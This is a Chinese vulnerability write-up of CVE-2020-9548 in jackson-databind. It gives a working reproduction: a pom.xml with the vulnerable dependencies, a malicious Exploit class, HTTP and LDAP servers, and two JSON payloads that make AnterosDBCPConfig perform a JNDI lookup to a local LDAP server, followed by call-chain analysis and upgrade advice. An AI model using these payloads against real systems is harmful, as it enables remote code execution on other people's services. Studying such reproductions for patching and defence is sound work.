CVE-2020-9548:Jackson-databind RCE

admin 2022年8月1日00:50:07评论44 views字数 2842阅读9分28秒阅读模式

影响范围

  • jackson-databind before 2.9.10.4

  • jackson-databind before 2.8.11.6

  • jackson-databind before 2.7.9.7

漏洞类型

JDNI注入导致RCE

利用条件

  • 开启enableDefaultTyping()

  • 使用了br.com.anteros.dbcp.AnterosDBCPConfig第三方依赖

漏洞概述

2020年3月,jackson-databind在github上更新了一个新的反序列化利用类br.com.anteros.dbcp.AnterosDBCPConfig,该类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。

漏洞复现

环境搭建

pom.xml

 <dependencies>    <dependency>      <groupId>com.fasterxml.jackson.core</groupId>      <artifactId>jackson-databind</artifactId>      <version>2.9.9.1</version>    </dependency>      <!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-DBCP -->      <dependency>          <groupId>br.com.anteros</groupId>          <artifactId>Anteros-DBCP</artifactId>          <version>1.0.1</version>      </dependency>      <dependency>      <groupId>org.slf4j</groupId>      <artifactId>slf4j-nop</artifactId>      <version>1.7.2</version>    </dependency>    <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->      <dependency>          <groupId>javax.transaction</groupId>          <artifactId>jta</artifactId>          <version>1.1</version>      </dependency>  </dependencies>
漏洞利用

这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~

LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181

编译Exploit.java

Exploit.java代码如下:

import java.lang.Runtime;
public class Exploit { static { try { Runtime.getRuntime().exec("calc"); } catch (Exception e) { e.printStackTrace(); } }}

编译Exploit.java文件:

CVE-2020-9548:Jackson-databind RCE

搭建HTTP服务

使用Python搭建简易SimpleHTTPServer服务:

python -m  SimpleHTTPServer 4444

CVE-2020-9548:Jackson-databind RCE

搭建LDAP服务

使用marshalsec来启动一个LDAP服务:

CVE-2020-9548:Jackson-databind RCE

执行漏洞POC1

Poc.java代码如下所示:


package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;import java.io.IOException;
public class Poc { public static void main(String[] args) throws Exception { ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); String payload = "["br.com.anteros.dbcp.AnterosDBCPConfig", {"metricRegistry":"ldap://127.0.0.1:1099/Exploit"}]"; try { mapper.readValue(payload, Object.class); } catch (IOException e) { e.printStackTrace(); } }}

之后运行该程序,成功执行命令,弹出计算器:

CVE-2020-9548:Jackson-databind RCE

执行漏洞POC2
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;import java.io.IOException;
public class Poc { public static void main(String[] args) throws Exception { ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); String payload = "["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry":"ldap://127.0.0.1:1099/Exploit"}]"; try { mapper.readValue(payload, Object.class); } catch (IOException e) { e.printStackTrace(); } }}

运行结果如下所示:

CVE-2020-9548:Jackson-databind RCE

漏洞分析

由于poc2与poc1类似,所以下面只对poc1进行简易分析:

首先定位到br.com.anteros.dbcp.AnterosDBCPConfig类,之后发现一处可疑的JNDI注入:

CVE-2020-9548:Jackson-databind RCE

由于参数来自object,所以之后全局搜索调用getObjectOrPerformJndiLookup函数调用的地方发现setMetricRegistry处有一处可控的调用,此处的参数metricRegistry可有json指定,之后传入getObjectOrPerformJndiLookup,之后再次传入lookup,从而导致JNDI注入的发生,并最终导致RCE:

CVE-2020-9548:Jackson-databind RCE

至于setHealthCheckRegistry也是一样的:

CVE-2020-9548:Jackson-databind RCE

整个利用链如下所示:

mapper.readValue    ->setMetricRegistry        ->getObjectOrPerformJndiLookup             ->lookup

修复建议

  • 及时将jackson-databind升级到安全版本

  • 升级到较高版本的JDK。

参考链接

https://github.com/FasterXML/jackson-databind/issues/2634


原文始发于微信公众号(七芒星实验室):CVE-2020-9548:Jackson-databind RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月1日00:50:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-9548:Jackson-databind RCEhttp://cn-sec.com/archives/1212136.html

发表评论

匿名网友 填写信息